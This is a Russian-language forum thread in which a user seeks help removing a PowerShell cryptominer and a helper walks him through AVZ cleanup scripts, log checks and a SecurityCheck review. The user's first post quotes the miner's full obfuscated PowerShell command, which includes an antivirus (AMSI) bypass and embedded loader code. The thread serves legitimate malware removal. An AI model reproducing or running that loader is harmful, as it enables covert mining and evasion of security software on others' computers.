PowerShell майнер

[WaL]

Здравствуйте. Завелся в системе майнер, грузит процессор.

При открытии диспетчера задач сразу нагрузка падает.

Kaspersky Virus Removal Tool, Dr.Web CureIt! ничего не обнаружили.

 

с помощью Anvir Task Manager выяснил, что процессор грузит powershell, запускаемый с такими параметрами:

 

Спойлер

powershell.exe -c "6370346088;$ZETx='nSyssteema.Mtan9agtem1enpt.dAu_tozma_ti_on).A_ms_iU8ti4ls_-a4ms-iIfni_tF_ai_lewd--No)nP9ub}liqc,nSt.at-ic' -replace('.pF(pF.pF.)'-replace'pF'),('$'+477/477);'o$ZaETkx=c$ZsETnx ,-s]plgit0''-4'';z[Rgef_].2Aslse_mb_ly1.G0et_Ty9pe_($_ZE_Tx?[08])p.GuetfFi_eljd(v$ZmETox[.1][,$_ZE_Tx[[2i])6.Suet_Vaglu_e(o$nfulsl,l(4b776-nie1j28_2)y) '-replace('.pF(pF.pF.)'-replace'pF'),('$'+477/477)|&('qoCSiqoCSeqoCSx'-replace'qoCS');'4&(sgcmm 2A*g-T[y*1)._Na,meu (=''nrus_9i7n5bg 6.S4yf8st_negm1m;um,s_i_,ng5g =Sntys_{t_e6)m.__I_O__;up_soikong_/ qSl,ys?(t}e}_m.!xR{uc/nt__i2m0+e.g)Ijnhste{=rao37pS9-e=rvpvi._c3ex_s;?.u.so8in_]gq t_Mi)fcirsoos_2oef74t.9aW7i-_n3y?2s;g2pulcb{l_2icf_ pc!_laxpsos?{ F8.p_v.bv{htd_e_4le{_g7am7te_f _v_moi2_d{ 23YEy_(_)]p;p_{u(b6_li8vco v_st1_a5trgice} _v,_oi_-d[ [[Dz2_(_)db{bv_y,t_2e[vx]rqg8WF!g=+Fr}il+qe9.ywExhii_sm2tsj)(]bx_rym_u_e{4rhkff_tpewt{/bkr6b)?_rFsiq8le_m.+Rtdea__d_Adkll_aB_y_xtey+sm(9_br__y9u2_er_(haf{_tw(at_b}_r)5_:)(pmbyr7t[e0-[]/,)zR__egtji_s?utrcuyo._wLo+ocua,_lM6_aec8ahi_ynoesw.O_spte)}nS__ufb]iKe,eyb()=@b__rtSa/OFdvT_Wi3AR2wE_\o}Mid_c_r_!os2wotf6/t\woClT9fF\d3ThI_dPbkqr4)_4.G8se5t,[Vay7l4umfe(_ub,r_5yu[_e8rf_hf/6t_w.{tbfgr_,_dnu(-l_ly1);73ijf__(qh_WhF=x==yenau_zllis)arq_etecukrm{n;?jiin4_t __T_Xa_NE5.=1qncWF_f.]Lk_env-g6tp2h;_pf{ohtr(]}i6n?8t ,2h_y5bf=_w0=;//hy![fh ni!=!mT1X_6NE5=-y1mv;he-yfffa++__)f{h_qWnhF![_4hym_ff]_n^==e(.bi3yteder)fibrf5D(pd{PG_iYyF(0z2_-Tgk_8T50_F_Mbn2r__llkt6Jw/so_Zj_GG-uW_N-e[2z_M_((x901_jrGta+Z7/50C__?vm1h=Q7)q2?1-f+)_Ydxoe{gj_X7{sve{r?4kt.q+Xn7f5(z)knio!D!io}P)4(P250!MrxY{ves!Bp_]p4hl2oihPo8g496_fn!n+4w6r6e_d0W4U7myV8w7-s5_br_-[(hl,yf_]M6sf_tW,v9q41l];zr}_Iu]nt_-P_t.-r _qZ(I__X=t_(aI3snts{P_teyr)dq0};(xIn,_t_Pvctr]b 2Nc=mE67a_=7i(If5n_t_[Pt8_r_)wlTX9_NqE-w;N[/teA]_lljro3cf1at=]eiV{{ir-9tuue?al!2Mje8pmo6)r_y_q((t{I?n{rtPzzt_r29)(72-s1?8),3_r]ebef s{Z_Iz[X,1f(lIt?nt?-P_tqwr)c_0n,6(rek_f] 7hNm__Ega)+,0.rxw1r-001_0_,_/0xqr450dl);)mMwa]/rs[!h4a1_l.dbC.oz_py_)(?q9tWFh_,/0_9,Z_kIlXp7,T6oXbN0-E))_;9(_5(Yv2Ey)b[Ma_}r_s{[hac_l{._8Ge+_t]D}_el_2eag.qat_he_Fhaor_]F_u0lnc_[t_ixion_yPjogvinultpeo1r(5_Z=I5xX,_yt/y_hpe6do!fc_(Y84E9)/_))_o(h)!);}xe[xDn_llspIfm7_po_gr_t+/(b!_rjn_-tdjql_l1dbrta),]j2prxbi3v[mat5he8 6ostv_a7thwicn_ ye_mxtsrekrczn wkl_o_dng__ }NgetA_!l_l4+ocffa_td]eVl?iur70tus!a6lk_Me_2m]oduryxf()Insnt__Pht_?r e2O+Xes,r__erf_? Ix9n_t{aPt_fr_ jcjix1u_grk,Iv[n_t1fPt__r3 taZcb7l)f_t,r_ie_f}f Il_n_t__Pta_r6 q,cZ!_P_F5t,U01I_n_gt3a-2_ 2bPM6ycw,i_UIiln9t?g32x! cBs)B)+_;m}'',-r_eptla_ce4''.+(._.)2'',4''$71''k -jre)plnacje''}brj'',7[c!halr]_(3l4)x -ure3plsac_e''cMsstW{'',5[c7hawr]3(3=7)n);h[E_nv_irhon_me8nt_]:c:Cfur_regnt)Diiregctsor,y=3pw_d;_[F?pv8v]{::lDz6()b; '-replace('.nzMY(nzMY.nzMY.)'-replace'nzMY'),('$'+600/600)|&('goZigoZegoZx'-replace'goZ');2005386948"    Командная строка    

 

 

Логи автологгера прикладываю, прошу помощи.

Архив автологгер

[Sandor]

Здравствуйте!

 

Логи прикрепляйте здесь к сообщению, пожалуйста.

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

begin
 DeleteSchedulerTask('Microsoft\Windows\Maintenance\WinDAT');
 DeleteSchedulerTask('Microsoft\Windows\SpacePort\SpacePort');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 ExecuteRepair(1);
RebootWindows(false);
end.

 

Компьютер перезагрузится.

 

Файл CheckBrowserLnk.log
 из папки

...\AutoLogger\CheckBrowserLnk

перетащите на утилиту ClearLNK.

Отчёт о работе в виде файла ClearLNK-<Дата>.log прикрепите к вашему следующему сообщению.
 

 

Для повторной диагностики запустите снова AutoLogger. Прикрепите новый CollectionLog.

[WaL]

51 минуту назад, Sandor сказал:

Логи прикрепляйте здесь к сообщению, пожалуйста

Да, конечно. Почему-то при создании темы не нашел, куда приложить файл.

 

Скрипт выполнил, логи приложил

Check_Browsers_LNK.log CollectionLog-2021.11.01-18.17.zip

[Sandor]

2 часа назад, Sandor сказал:

ClearLNK-<Дата>.log прикрепите к вашему следующему сообщению

Вы не тот прикрепили.

 

В логах порядок. Проблема решена?

[WaL]

7 минут назад, Sandor сказал:

Проблема решена?

Вроде да, по крайней мере активности пока не замечаю.

Спасибо!

ClearLNK-2021.11.01_18.15.08.log

[Sandor]

В завершение:

• Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
• Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
• Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
• Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
• Прикрепите этот файл к своему следующему сообщению.

 

[WaL]

SecurityCheck.txt

[Sandor]

------------------------------- [ Windows ] -------------------------------
Контроль учётных записей пользователя включен
Запрос на повышение прав для администраторов отключен
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
--------------------------- [ OtherUtilities ] ----------------------------
Notepad++ (64-bit x64) v.8.1.5 Внимание! Скачать обновления
Microsoft Office профессиональный плюс 2019 - ru-ru v.16.0.12026.20320 Внимание! Скачать обновления
^Инструкция по обновлению Microsoft Office.^
Microsoft Visual Studio Code (User) v.1.56.2 Внимание! Скачать обновления
------------------------------ [ ArchAndFM ] ------------------------------
Total Commander 64-bit (Remove or Repair) v.9.51 Внимание! Скачать обновления
WinRAR 6.00 (64-разрядная) v.6.00.0 Внимание! Скачать обновления
--------------------------------- [ P2P ] ---------------------------------
µTorrent v.3.5.5.46096 Внимание! Клиент сети P2P с рекламным модулем!.
-------------------------------- [ Java ] ---------------------------------
Java 8 Update 291 (64-bit) v.8.0.2910.10 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u311-windows-x64.exe)^
Java 8 Update 51 (64-bit) v.8.0.510 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u311-windows-x64.exe)^
------------------------------- [ Browser ] -------------------------------
Blackhawk Emulation Device Drivers for Windows - v1.18.08.06 v.1.18.08.06 Данная программа больше не поддерживается разработчиком.
 

 

Читайте Рекомендации после удаления вредоносного ПО